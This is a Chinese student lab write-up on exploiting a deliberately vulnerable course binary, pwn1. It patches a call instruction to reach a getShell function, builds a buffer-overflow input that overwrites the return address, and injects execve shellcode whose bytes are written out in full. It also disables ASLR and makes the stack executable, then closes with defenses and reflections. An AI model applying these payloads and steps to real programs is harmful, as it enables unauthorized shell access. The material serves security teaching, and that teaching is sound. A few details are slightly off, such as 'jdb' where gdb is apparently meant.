Exp1 PC平台逆向破解(5)M
一、实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
·三个实践内容如下:
1.手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
2.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
3.注入一个自己制作的shellcode并运行这段shellcode。
·这几种思路,基本代表现实情况中的攻击目标:
1.运行原本不可访问的代码片段
2.强行修改程序执行流
3.以及注入运行任意代码。
几个汇编指令:
NOP:空操作指令,用于控制时间周期,行Nop指令只使程序计数器PC加1,机器码为0x90。
JNE:一个条件转移指令,如果不相等则跳转,机器码为75。
JE:一个条件转移指令,如果相等则跳转,机器码为74。
JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)。
CMP:算数处理指令,用于把一个寄存器的内容和另一个寄存器的内容或立即数进行减法比较,不存储结果,都会更改标志位,机器码为38-3D。
二、直接修改程序机器指令,改变程序执行流程
·知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
·学习目标:理解可执行文件与机器指令
·进阶:掌握ELF文件格式,掌握动态技术
打开终端,输入objdump -d pwn1-20191202 | more进行反汇编
其中,汇编指令“call 8048491” 将调用位于地址8048491处的foo函数,其对应机器指令为“e8 d7ffffff”,e8即跳转之意。
·本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令呢,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值。
·main函数调用foo,对应机器指令为“ e8 d7ffffff”,
·那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。
·用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。
·下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。
(1)复制pwn1到pwn2;
(2)在vi中打开pwn2;
(3)输入%!xxd将显示模式切换为16进制模式;
(4)查找要修改内容/e8d7,将d7改为c3l;
(5)输入%!xxd -r转换16进制为原格式,存盘退出。
再反汇编看一下,call指令是否正确调用getShell
运行下改后的代码,会得到shell提示符#
三、通过构造输入参数,造成BOF攻击,改变程序执行流
知识要求:堆栈结构,返回地址
学习目标:理解攻击缓冲区的结果,掌握返回地址的获取
进阶:掌握ELF文件格式,掌握动态技术
1.反汇编,了解程序的基本功能
== 注意这个函数getShell,我们的目标是触发这个函数 ==
== 该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞 ==
== 这里读入字符串,但系统只预留了28字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址 ==
==上面的call调用foo,同时在堆栈上压上返回地址值:80484ba==
2.确认输入字符串哪几个字符会覆盖到返回地址
安装jdb,输入jdb -v显示版本信息为成功
当输入的为1111111122222222333333334444444455555555可以看到eip的值0x35353535也就是5555的ASCII码:
如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。
3.确认用什么值来覆盖返回地址
getShell的内存地址,通过反汇编时可以看到,即0804847d。
接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。
对比之前 ==eip 0x34333231 0x34333231== ,根据小端优先原则,正确应用输入 ==11111111222222223333333344444444\x7d\x84\x04\x08==。
4.构造输入字符串
由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。
输入“perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input”,使用16进制查看指令xxd查看input文件的内容是否如预期。
然后将input的输入,通过管道符“|”,作为pwn1的输入
四、注入Shellcode并执行
1.准备一段Shellcode
shellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
- 所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令
2.准备工作
安装prelink
先通过execstack -s指令来设置堆栈可执行
再用 execstack -q 指令查询文件的堆栈是否可执行
关闭地址随机化
3.构造要注入的payload
- Linux下有两种基本构造攻击buf的方法:
- retaddr+nop+shellcode
- nop+shellcode+retaddr
- 因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
- 简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
使用结构为:anything+retaddr+nops+shellcode 的 方法
输入perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
接下来我们来确定\x4\x3\x2\x1到底该填什么。
打开一个终端注入这段攻击buf:(cat input_shellcode;cat) | ./pwn1-20191202
再开另外一个终端,用gdb来调试pwn1这个进程。
通过指令“ps -ef | grep pwn1-20191202"确定进程号为3889,然后开始gdb调试。
将1234位置的地址加上4字节(shellcode挨在缓冲
区的后面)即可得到shellcode的地址0xffffd500,所以将0xffffd500替换1234,便可令shellcode的地址覆盖ret返回地址,所以此处输入的shellcode应为:
perl -e 'print "A" x 32;print "\x00\xd5\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
注入shellcode之后执行pwn1-20191202,执行后输入ls,成功执行ls指令。
4.结合nc模拟远程攻击
本例中是在同一台主机上做的实验;该实验最好在互相连通的两台Linux上做,将ip地址替换为主机1的IP即可。
主机1,模拟一个有漏洞的网络服务:
主机2,连接主机1并发送攻击载荷:
第三个终端单步调查看nops地址:
由此可得地址为 0xffffd510 ,注入进ret返回地址里面。
五、Bof攻击防御技术
1.从防止注入的角度
在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。
2.注入入了也不让运行
结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了。
3.增加shellcode的构造难度
shellcode中需要猜测==返回地址==的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。
/proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制(address space layout randomization),有以下三种情况:
0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址,stack和vdso页面随机化。
2 - 表示在1的基础上增加栈(heap)的随机化。
实验体会
本次实验让我对缓冲区溢出有了更深的了解。之前对缓冲区溢出的了解只停留在那个使用strcpy()函数的C语言代码上。现在知道了eip、ebp、esp以及call、leave等。同时,之前学过的Linux系统的一些操作指令和汇编语言的一些知识也在这次实验中做到了学以致用。
在实验中,我也遇到了一些问题。比如运行pwn2时出现权限不够的问题,参考中是改pwn2的运行权限,但我发现pwn2的运行权限改不了,这时需要先改pwn1的运行权限然后复制就可以了。